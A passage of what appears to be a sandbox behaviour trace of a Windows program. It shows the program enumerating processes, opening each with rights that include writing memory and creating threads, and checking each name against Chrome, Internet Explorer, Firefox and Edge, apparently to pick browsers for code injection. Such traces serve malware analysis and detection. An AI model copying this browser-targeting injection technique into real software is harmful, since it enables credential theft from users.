	[0232.451] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x6d88
	[0232.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.451] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.452] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.452] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.452] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.453] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.453] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x6d8c
	[0232.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.454] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.454] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.454] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.455] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.455] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.456] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x6d90
	[0232.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.456] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.457] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.457] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.458] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.458] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0232.459] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x6d94
	[0232.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.459] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0232.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.459] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.459] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0232.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.460] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.460] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.461] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x6d98
	[0232.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.461] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.461] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.462] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.462] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.462] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0232.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x6d9c
	[0232.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.463] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.463] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.464] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.464] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.464] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0232.465] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x6da0
	[0232.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.465] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0232.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.466] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.466] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0232.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.466] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.467] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.467] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x6da4
	[0232.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.467] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.468] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.468] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.468] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.469] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0232.469] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x6da8
	[0232.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.470] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0232.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.470] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.470] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0232.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.471] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.471] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0232.472] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x6dac
	[0232.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.472] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0232.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.473] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.473] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0232.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.473] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.474] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0232.474] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x6db0
	[0232.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.474] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0232.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.475] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.475] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0232.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.475] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.475] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0232.476] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x6db4
	[0232.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.476] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0232.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.477] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.477] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0232.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.477] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.478] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0232.478] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0232.478] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0232.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x6db8
	[0232.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.479] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0232.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.480] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.481] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0232.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.481] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.482] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0232.483] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x6dbc
	[0232.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.483] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0232.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.483] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.483] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0232.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.484] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.484] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0232.485] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x6dc0
	[0232.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.485] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0232.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.485] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.486] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0232.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.486] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.486] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0232.487] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x6dc4
	[0232.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.487] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0232.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.488] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.488] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0232.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.488] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.489] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0232.490] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x6dc8
	[0232.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.490] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0232.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.490] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.491] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0232.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.491] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.492] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0232.493] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x6dcc
	[0232.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.493] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0232.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.493] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.493] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0232.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.494] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.494] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0232.495] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x6dd0
	[0232.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.495] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0232.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.495] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.496] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0232.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.496] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.496] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0232.497] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x6dd4
	[0232.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.497] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0232.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.498] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.498] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0232.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.499] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.499] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0232.500] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x6dd8
	[0232.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.500] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0232.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.500] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.501] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0232.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.501] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.501] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0232.502] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x6ddc
	[0232.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.502] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0232.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.502] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.503] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0232.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.503] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.504] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0232.504] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x6de0
	[0232.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.505] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0232.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.505] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.506] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0232.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.506] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.506] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0232.507] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x6de4
	[0232.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.507] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0232.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.508] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.509] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0232.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.509] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.510] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0232.510] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x6de8
	[0232.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.511] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0232.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
